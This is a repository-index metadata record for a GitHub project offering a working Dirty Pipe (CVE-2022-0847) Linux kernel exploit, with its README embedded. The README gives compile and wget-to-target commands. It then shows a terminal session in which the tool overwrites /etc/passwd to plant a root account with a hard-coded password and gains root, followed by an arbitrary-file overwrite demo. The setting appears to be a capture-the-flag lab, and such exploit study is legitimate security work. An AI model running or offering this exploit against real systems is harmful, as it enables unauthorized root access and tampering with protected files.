{"id":18704788,"url":"https://github.com/n3rada/dirtypipe","last_synced_at":"2025-07-03T07:07:16.549Z","repository":{"id":200385095,"uuid":"705367804","full_name":"n3rada/DirtyPipe","owner":"n3rada","description":"Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.","archived":false,"fork":false,"pushed_at":"2023-10-15T22:23:44.000Z","size":356,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-04-24T07:46:36.598Z","etag":null,"topics":["cve-2022-0847","dirty-pipe","kernel-exploit","pentesting","unix"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n3rada.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-10-15T20:13:11.000Z","updated_at":"2024-04-08T04:48:57.000Z","dependencies_parsed_at":null,"dependency_job_id":"746b9c03-b9f6-4006-8be1-7cecf038e01b","html_url":"https://github.com/n3rada/DirtyPipe","commit_stats":null,"previous_names":["n3rada/dirtypipe"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n3rada","download_url":"https://codeload.github.com/n3rada/DirtyPipe/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223510320,"owners_count":17157306,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2022-0847","dirty-pipe","kernel-exploit","pentesting","unix"],"created_at":"2024-11-07T12:08:20.543Z","updated_at":"2024-11-07T12:08:21.059Z","avatar_url":"https://github.com/n3rada.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Dirty Pipe Exploit: CVE-2022-0847\nThe Dirty Pipe vulnerability, also known as CVE-2022-0847, is a significant flaw within the Linux kernel. This repository provides an adapted version of the widely used exploit code to make it more user-friendly and modular.\n\nA very good explanation of this vulnerability can be found on the [HackTheBox blog](https://www.hackthebox.com/blog/Dirty-Pipe-Explained-CVE-2022-0847). Max Kellermann's original, more detailed explanation can be found [on his blog](https://dirtypipe.cm4all.com/).\n\nThis adapted version is segmented into different methods to increase modularity and ease of modification. Notably, there's an added --root option that modifies the /etc/passwd file, to leverage root access with password `el3ph@nt!`.\n\nCompile the exploit statically:\n```shell\ngcc -o dpipe dpipe.c -static\n```\n\nAnd retrieve-it from your target before launching-it:\n```shell\nyoan@teecup:~$ wget http://YOUR_SERVER_ADDRESS/unix/cve/dpipe\n--2023-10-15 20:07:44--  http://YOUR_SERVER_ADDRESS/unix/cve/dpipe\nConnecting to YOUR_SERVER_ADDRESS:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 769792 (752K) [text/plain]\nSaving to: ‘dpipe’\n\ndpipe                                   100%[=============================================================================\u003e] 751.75K  --.-KB/s    in 0.09s\n\n2023-10-15 20:07:44 (8.09 MB/s) - ‘dpipe’ saved [769792/769792]\n\nyoan@teecup:~$ chmod +x dpipe\nyoan@teecup:~$ ./dpipe --root\n[Dirty Pipe] Attempting to backup '/etc/passwd' to '/tmp/passwd.bak'\n[Dirty Pipe] Successfully backed up '/etc/passwd' to '/tmp/passwd.bak'\n[Dirty Pipe] Initiating write to '/etc/passwd'...\n[Dirty Pipe] Data size to write: 131 bytes\n[Dirty Pipe] File '/etc/passwd' opened successfully for reading.\n[Dirty Pipe] Pipe size determined: 65536 bytes\n[Dirty Pipe] Filling the pipe...\n[Dirty Pipe] Pipe filled successfully.\n[Dirty Pipe] Draining the pipe...\n[Dirty Pipe] Pipe drained successfully.\n[Dirty Pipe] Data successfully written to '/etc/passwd'.\n[Dirty Pipe] You can connect as root with password 'el3ph@nt!'\n[Dirty Pipe] Program execution completed successfully.\nyoan@teecup:~$\nyoan@teecup:~$ cat /etc/passwd\nroot:$6$9WETWbCBTQ8pxg4I$odZAx8iIlayCnFdUwDM5dHVfsXXZo1RHRp2a4uQzcPDkRiTJYLA4loZESihn4ASGhWKN9.RWPT.CZJdyfTej4/:0:0:root:/root:/bin/sh\n:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nmessagebus:x:103:104::/nonexistent:/usr/sbin/nologin\nsshd:x:104:65534::/run/sshd:/usr/sbin/nologin\nyoan:x:1000:1000::/home/yoan:/bin/bash\nyoan@teecup:~$ su root\nPassword:\n# cd /root\n# cat flag.txt\nGreat job! You found me.\n```\n\nYou can also use the exploit to overwrite content in other files:\n```shell\nyoan@teecup:~$ echo \"Vxxx\" \u003e dirty\nyoan@teecup:~$ cat dirty\nVxxx\nyoan@teecup:~$ ./dpipe dirty 1 uln\n[Dirty Pipe] Standard file overwrite mode detected...\n[Dirty Pipe] Attempting to backup 'dirty' to '/tmp/dirty.bak'\n[Dirty Pipe] Successfully backed up 'dirty' to '/tmp/dirty.bak'\n[Dirty Pipe] Initiating write to 'dirty'...\n[Dirty Pipe] Data size to write: 3 bytes\n[Dirty Pipe] File 'dirty' opened successfully for reading.\n[Dirty Pipe] Pipe size determined: 65536 bytes\n[Dirty Pipe] Filling the pipe...\n[Dirty Pipe] Pipe filled successfully.\n[Dirty Pipe] Draining the pipe...\n[Dirty Pipe] Pipe drained successfully.\n[Dirty Pipe] Data successfully written to 'dirty'.\n[Dirty Pipe] Program execution completed successfully.\nyoan@teecup:~$ cat dirty\nVuln\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Fdirtypipe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn3rada%2Fdirtypipe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Fdirtypipe/lists"}